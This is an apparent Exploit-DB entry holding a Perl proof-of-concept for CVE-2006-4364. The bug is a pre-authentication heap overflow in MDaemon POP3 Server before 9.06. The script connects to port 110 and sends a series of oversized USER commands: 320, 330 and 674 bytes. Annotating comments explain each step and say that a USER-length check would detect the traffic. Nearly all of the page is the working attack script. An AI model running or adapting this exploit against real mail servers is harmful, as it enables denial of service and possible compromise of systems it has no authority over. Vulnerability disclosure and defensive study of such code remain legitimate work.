MDaemon POP3 Server < 9.06 - USER Remote Buffer Overflow PoC

2006-08-22T00:00:00
ID EDB-ID:2245
Type exploitdb
Reporter Leon Juranic
Modified 2006-08-22T00:00:00

Description

MDaemon POP3 Server < 9.06 (USER) Remote Buffer Overflow PoC. CVE-2006-4364. DoS exploit for the Windows platform.

                                        
                                            #
# PoC for MDaemon POP3 preauth heap overflow
#
# Coded by Leon Juranic <leon.juranic@infigo.hr>
# Infigo IS <http://www.infigo.hr>
# 
#

# Flat proof-of-concept script: it opens POP3 sessions to $host on TCP 110 and
# sends only USER and QUIT commands (no PASS), so every request is
# pre-authentication. Per the page title, MDaemon versions before 9.06 are
# affected (CVE-2006-4364); 9.06 or later is the fixed line.
#
# Defender's view of the traffic: the USER arguments below are 320, 330 and
# 674 bytes long, while RFC 1939 caps a POP3 command argument at 40 characters.
# A length check on the pre-auth USER line (proxy, IDS rule or server-side
# input validation) is therefore enough to flag or reject these requests.

# Target is hard-coded; 192.168.0.105 is an RFC 1918 private address
# (presumably the author's test host).
$host = '192.168.0.105';

# NOTE(review): there is no `use strict` / `use warnings`; $host, $x, $sock and
# $var are all package globals. The page HTML-escaped the operators in the code
# below (`&lt;` stands for `<`, `=&gt;` for `=>`).
use IO::Socket;

# Phase 1: twelve identical sessions, one second apart. Each sends a single
# oversized USER line and then closes cleanly with QUIT.
# NOTE(review): the page does not explain why twelve rounds precede the final
# session; given the "heap overflow" description it presumably conditions
# server-side memory state. Confirm against the vendor advisory.
for ($x = 0 ; $x &lt; 12 ; $x++)
{
	# Fresh TCP connection per round; `|| die` fires only if the connect fails.
	$sock = new IO::Socket::INET (PeerAddr =&gt; $host,PeerPort =&gt; '110', Proto =&gt; 'tcp') 
	|| die "socket error\n\n";
	# Read up to 10000 bytes (the server greeting) and echo it to STDOUT.
	# The recv return value is never checked anywhere in this script.
	recv ($sock, $var, 10000,0);
	print $var;
	# USER argument: "@A" repeated 160 times = 320 bytes.
	print $sock "USER " . "\@A" x 160 . "\r\n";
	recv ($sock, $var, 10000,0);
	print $var;
	# Orderly session end before the next round.
	print $sock "QUIT\r\n";
	recv ($sock, $var, 10000,0);
	print $var;
	close ($sock);
	sleep(1);
}
	# Phase 2: one more session that sends two USER commands back to back on the
	# same connection and never sends QUIT or closes the socket explicitly.
	$sock = new IO::Socket::INET (PeerAddr =&gt; $host,PeerPort =&gt; '110', Proto =&gt; 'tcp') 
	|| die "socket error\n\n";
	recv ($sock, $var, 10000,0);
	print $var;
	# First USER argument: "@A@A" followed by 326 "B" characters = 330 bytes.
	print $sock "USER " . "\@A\@A" . "B" x 326 . "\r\n";
	recv ($sock, $var, 10000,0);
	print $var;
	# Second USER argument: "'A" repeated 337 times = 674 bytes.
	print $sock "USER " . "\'A" x  337 . "\r\n";
	recv ($sock, $var, 10000,0);
	print $var;
	# The script reports no result of its own; it only prints whatever the
	# server returned, then waits two seconds and exits.
	sleep(2);

# milw0rm.com [2006-08-22]